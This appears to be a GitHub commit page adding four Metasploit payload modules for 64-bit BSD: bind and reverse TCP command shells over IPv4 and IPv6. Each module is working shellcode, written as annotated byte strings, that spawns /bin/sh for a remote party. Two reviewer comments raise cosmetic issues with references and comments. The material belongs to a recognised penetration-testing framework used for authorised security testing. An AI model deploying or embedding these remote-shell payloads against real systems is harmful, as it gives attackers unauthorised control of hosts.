
Commit a2bdd0b

author
Brent Cook
committed
Land rapid7#5541, add more compat fixed-cmd 64-bit BSD payloads
Merge branch 'land-5541-bsd-shellcode' into upstream-master
2 parents 07d0582 + 493a640 commit a2bdd0b


5 files changed

+413
-30
lines changed

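--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,86 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+CachedSize = 89
+
+include Msf::Payload::Single
+include Msf::Payload::Bsd
+include Msf::Sessions::CommandShellOptions
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'BSD x64 Command Shell, Bind TCP Inline (IPv6)',
+'Description' => 'Listen for a connection and spawn a command shell over IPv6',
+'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_bind_tcp.asm.c'],
+'License' => MSF_LICENSE,
+'Platform' => 'bsd',
+'Arch' => ARCH_X86_64,
+'Handler' => Msf::Handler::BindTcp,
+'Session' => Msf::Sessions::CommandShellUnix,
+'Payload' =>
+{
+'Offsets' =>
+{
+'LPORT' => [ 20, 'n' ],
+},
+'Payload' =>
+"\x6a\x61" +# pushq $0x61 #
+"\x58" +# pop %rax #
+"\x99" +# cltd #
+"\x6a\x1c" +# pushq $0x1c #
+"\x5f" +# pop %rdi #
+"\x6a\x01" +# pushq $0x1 #
+"\x5e" +# pop %rsi #
+"\x0f\x05" +# syscall #
+"\x48\x97" +# xchg %rax,%rdi #
+"\x52" +# push %rdx #
+"\x52" +# push %rdx #
+"\x52" +# push %rdx #
+"\x68\x00\x1c\x11\x5c" +# pushq $0x5c111c00 #
+"\x48\x89\xe6" +# mov %rsp,%rsi #
+"\x6a\x1c" +# pushq $0x1c #
+"\x5a" +# pop %rdx #
+"\x04\x4c" +# add $0x4c,%al #
+"\x0f\x05" +# syscall #
+"\x48\x31\xf6" +# xor %rsi,%rsi #
+"\x6a\x6a" +# pushq $0x6a #
+"\x58" +# pop %rax #
+"\x0f\x05" +# syscall #
+"\x99" +# cltd #
+"\x04\x1e" +# add $0x1e,%al #
+"\x0f\x05" +# syscall #
+"\x48\x89\xc7" +# mov %rax,%rdi #
+"\x6a\x5a" +# pushq $0x5a #
+"\x58" +# pop %rax #
+"\x0f\x05" +# syscall #
+"\xff\xc6" +# inc %esi #
+"\x04\x5a" +# add $0x5a,%al #
+"\x0f\x05" +# syscall #
+"\xff\xc6" +# inc %esi #
+"\x04\x59" +# add $0x59,%al #
+"\x0f\x05" +# syscall #
+"\x52" +# push %rdx #
+"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
+"\x69\x6e\x2f\x73\x68" +# mov "in/sh",%rdi #
+"\x57" +# push %rdi #
+"\x48\x89\xe7" +# mov %rsp,%rdi #
+"\x52" +# push %rdx #
+"\x57" +# push %rdi #
+"\x48\x89\xe6" +# mov %rsp,%rsi #
+"\x04\x39" +# add $0x39,%al #
+"\x0f\x05" # syscall #
+}
+))
+end
+
+end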
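Review bot: The `'References'` entry passes a flat two-element array, `['URL', 'https://...']`, where Metasploit module info takes an array of `[type, value]` pairs; unless the framework special-cases a flat pair, this is read as two malformed references (one built from the bare string `'URL'`, one from the bare URL) instead of one URL reference. Change it to `'References' => [['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_bind_tcp.asm.c']],`. The same flat-array form appears in the other three new modules in this commit (the IPv4 bind, IPv6 reverse and IPv4 reverse payloads) and should be fixed the same way there.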
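--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+CachedSize = 87
+
+include Msf::Payload::Single
+include Msf::Payload::Bsd
+include Msf::Sessions::CommandShellOptions
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'BSD x64 Command Shell, Bind TCP Inline',
+'Description' => 'Listen for a connection and spawn a command shell',
+'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_bind_tcp.asm.c'],
+'License' => MSF_LICENSE,
+'Platform' => 'bsd',
+'Arch' => ARCH_X86_64,
+'Handler' => Msf::Handler::BindTcp,
+'Session' => Msf::Sessions::CommandShellUnix,
+'Payload' =>
+{
+'Offsets' =>
+{
+'LPORT' => [ 18, 'n' ],
+},
+'Payload' =>
+"\x6a\x61" +# pushq $0x61 #
+"\x58" +# pop %rax #
+"\x99" +# cltd #
+"\x6a\x02" +# pushq $0x2 #
+"\x5f" +# pop %rdi #
+"\x6a\x01" +# pushq $0x1 #
+"\x5e" +# pop %rsi #
+"\x0f\x05" +# syscall #
+"\x48\x97" +# xchg %rax,%rdi #
+"\x52" +# push %rdx #
+"\x68\x00\x02\x11\x5c" +# pushq $0x5c110200 #
+"\x48\x89\xe6" +# mov %rsp,%rsi #
+"\x6a\x10" +# pushq $0x10 #
+"\x5a" +# pop %rdx #
+"\x04\x66" +# add $0x66,%al #
+"\x0f\x05" +# syscall #
+"\x48\x31\xf6" +# xor %rsi,%rsi #
+"\x6a\x6a" +# pushq $0x6a #
+"\x58" +# pop %rax #
+"\x0f\x05" +# syscall #
+"\x99" +# cltd #
+"\x04\x1e" +# add $0x1e,%al #
+"\x0f\x05" +# syscall #
+"\x48\x89\xc7" +# mov %rax,%rdi #
+"\x6a\x5a" +# pushq $0x5a #
+"\x58" +# pop %rax #
+"\x0f\x05" +# syscall #
+"\xff\xc6" +# inc %esi #
+"\x04\x5a" +# add $0x5a,%al #
+"\x0f\x05" +# syscall #
+"\xff\xc6" +# inc %esi #
+"\x04\x59" +# add $0x59,%al #
+"\x0f\x05" +# syscall #
+"\x52" +# push %rdx #
+"\x48\xbf\x2f\x2f" +# mov "//" #
+"\x62\x69\x6e\x2f" +# "bin/sh" #
+"\x73\x68" +# mov $0x68732f6e69622f2f,%rdi #
+"\x57" +# push %rdi #
+"\x48\x89\xe7" +# mov %rsp,%rdi #
+"\x52" +# push %rdx #
+"\x57" +# push %rdi #
+"\x48\x89\xe6" +# mov %rsp,%rsi #
+"\x04\x39" +# add $0x39,%al #
+"\x0f\x05" # syscall #
+}
+))
+end
+
+end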
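--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,92 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+CachedSize = 105
+
+include Msf::Payload::Single
+include Msf::Payload::Bsd
+include Msf::Sessions::CommandShellOptions
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'BSD x64 Command Shell, Reverse TCP Inline (IPv6)',
+'Description' => 'Connect back to attacker and spawn a command shell over IPv6',
+'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_reverse_tcp.asm.c'],
+'License' => MSF_LICENSE,
+'Platform' => 'bsd',
+'Arch' => ARCH_X86_64,
+'Handler' => Msf::Handler::ReverseTcp,
+'Session' => Msf::Sessions::CommandShellUnix,
+'Payload' =>
+{
+'Offsets' =>
+{
+'LHOST' => [ 85, 'ADDR6' ],
+'LPORT' => [ 79, 'n' ],
+'SCOPEID' => [ 101, 'V' ]
+},
+'Payload' =>
+"\x6a\x61" +# pushq $0x61 #
+"\x58" +# pop %rax #
+"\x99" +# cltd #
+"\x6a\x1c" +# pushq $0x1c #
+"\x5f" +# pop %rdi #
+"\x6a\x01" +# pushq $0x1 #
+"\x5e" +# pop %rsi #
+"\x0f\x05" +# syscall #
+"\x48\x97" +# xchg %rax,%rdi #
+"\x04\x3e" +# add $0x3e,%al #
+"\x0f\x05" +# syscall #
+"\xff\xc6" +# inc %esi #
+"\x04\x59" +# add $0x59,%al #
+"\x0f\x05" +# syscall #
+"\xff\xce" +# dec %esi #
+"\xff\xce" +# dec %esi #
+"\x04\x58" +# add $0x58,%al #
+"\x0f\x05" +# syscall #
+"\xe9\x23\x00\x00\x00" +# jmpq <forth> #
+# back:
+"\x5e" +# pop %rsi #
+"\x6a\x1c" +# pushq $0x1c #
+"\x5a" +# pop %rdx #
+"\x66\x83\xc0\x62" +# add $0x62,%ax #
+"\x0f\x05" +# syscall #
+"\x99" +# cltd #
+"\x52" +# push %rdx #
+"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
+"\x69\x6e\x2f\x73\x68" +# "in/sh",%rdi #
+"\x57" +# push %rdi #
+"\x48\x89\xe7" +# mov %rsp,%rdi #
+"\x52" +# push %rdx #
+"\x57" +# push %rdi #
+"\x48\x89\xe6" +# mov %rsp,%rsi #
+"\x04\x3b" +# add $0x3b,%al #
+"\x0f\x05" +# syscall #
+# forth:
+"\xe8\xd8\xff\xff\xff" +# callq <back> #
+# sockaddr_in6
+"\x00\x1c\x11\x5c" +# AF_INET6+port #
+"\x00\x00\x00\x00" +# no-one-cares #
+"\x00\x00\x00\x00" +# IPv6- #
+"\x00\x00\x00\x00" +# addr- #
+"\x00\x00\x00\x00" +# in- #
+"\x00\x00\x00\x01" +# 16 bytes #
+"\x00\x00\x00\x00" # Scope ID #
+}
+))
+register_options([
+OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0])
+])
+end
+
+end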
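Review bot: The sockaddr_in6 trailer at the end of the payload string is annotated with comments (`# no-one-cares #`, `# IPv6- #`, `# addr- #`, `# in- #`, `# 16 bytes #`) that do not name the structure fields, so a reader cannot match `'LHOST' => [ 85, 'ADDR6' ]` and `'SCOPEID' => [ 101, 'V' ]` in the Offsets table to the bytes without counting them by hand. Label each four-byte group by field instead, e.g. `# sin6_flowinfo (unused) #` on the second group, `# sin6_addr, 16 bytes, patched via LHOST offset 85 #` on the first address group, and `# sin6_scope_id, patched via SCOPEID offset 101 #` on the last. The `# AF_INET6+port #` comment on the first group could likewise say that the two port bytes are the ones patched at LPORT offset 79.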
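--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,80 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+CachedSize = 81
+
+include Msf::Payload::Single
+include Msf::Payload::Bsd
+include Msf::Sessions::CommandShellOptions
+
+def initialize(info = {})
+super(merge_info(info,
+'Name' => 'BSD x64 Command Shell, Reverse TCP Inline',
+'Description' => 'Connect back to attacker and spawn a command shell',
+'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_reverse_tcp.asm.c'],
+'License' => MSF_LICENSE,
+'Platform' => 'bsd',
+'Arch' => ARCH_X86_64,
+'Handler' => Msf::Handler::ReverseTcp,
+'Session' => Msf::Sessions::CommandShellUnix,
+'Payload' =>
+{
+'Offsets' =>
+{
+'LHOST' => [ 39, 'ADDR' ],
+'LPORT' => [ 37, 'n' ],
+},
+'Payload' =>
+"\x6a\x61" +# pushq $0x61 #
+"\x58" +# pop %rax #
+"\x99" +# cltd #
+"\x6a\x02" +# pushq $0x2 #
+"\x5f" +# pop %rdi #
+"\x6a\x01" +# pushq $0x1 #
+"\x5e" +# pop %rsi #
+"\x0f\x05" +# syscall #
+"\x48\x97" +# xchg %rax,%rdi #
+"\x04\x58" +# add $0x58,%al #
+"\x0f\x05" +# syscall #
+"\xff\xc6" +# inc %esi #
+"\x04\x59" +# add $0x59,%al #
+"\x0f\x05" +# syscall #
+"\xff\xce" +# dec %esi #
+"\xff\xce" +# dec %esi #
+"\x04\x58" +# add $0x58,%al #
+"\x0f\x05" +# syscall #
+"\x52" +# push %rdx #
+"\x48\xbb\x00\x02\x11" +# mov ... #
+"\x5c\x7f\x00\x00\x01" +# mov $0x100007f5c110200,%rbx #
+"\x53" +# push %rbx #
+"\x48\x89\xe6" +# mov %rsp,%rsi #
+"\x6a\x10" +# pushq $0x10 #
+"\x5a" +# pop %rdx #
+"\x66\x83\xc0\x62" +# add $0x62,%ax #
+"\x0f\x05" +# syscall #
+"\x99" +# cltd #
+"\x52" +# push %rdx #
+"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
+"\x69\x6e\x2f\x73\x68" +# "in/sh", %rdi #
+"\x57" +# push %rdi #
+"\x48\x89\xe7" +# mov %rsp,%rdi #
+"\x52" +# push %rdx #
+"\x57" +# push %rdi #
+"\x48\x89\xe6" +# mov %rsp,%rsi #
+"\x04\x3b" +# add $0x3b,%al #
+"\x0f\x05" # syscall #
+}
+))
+end
+
+end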
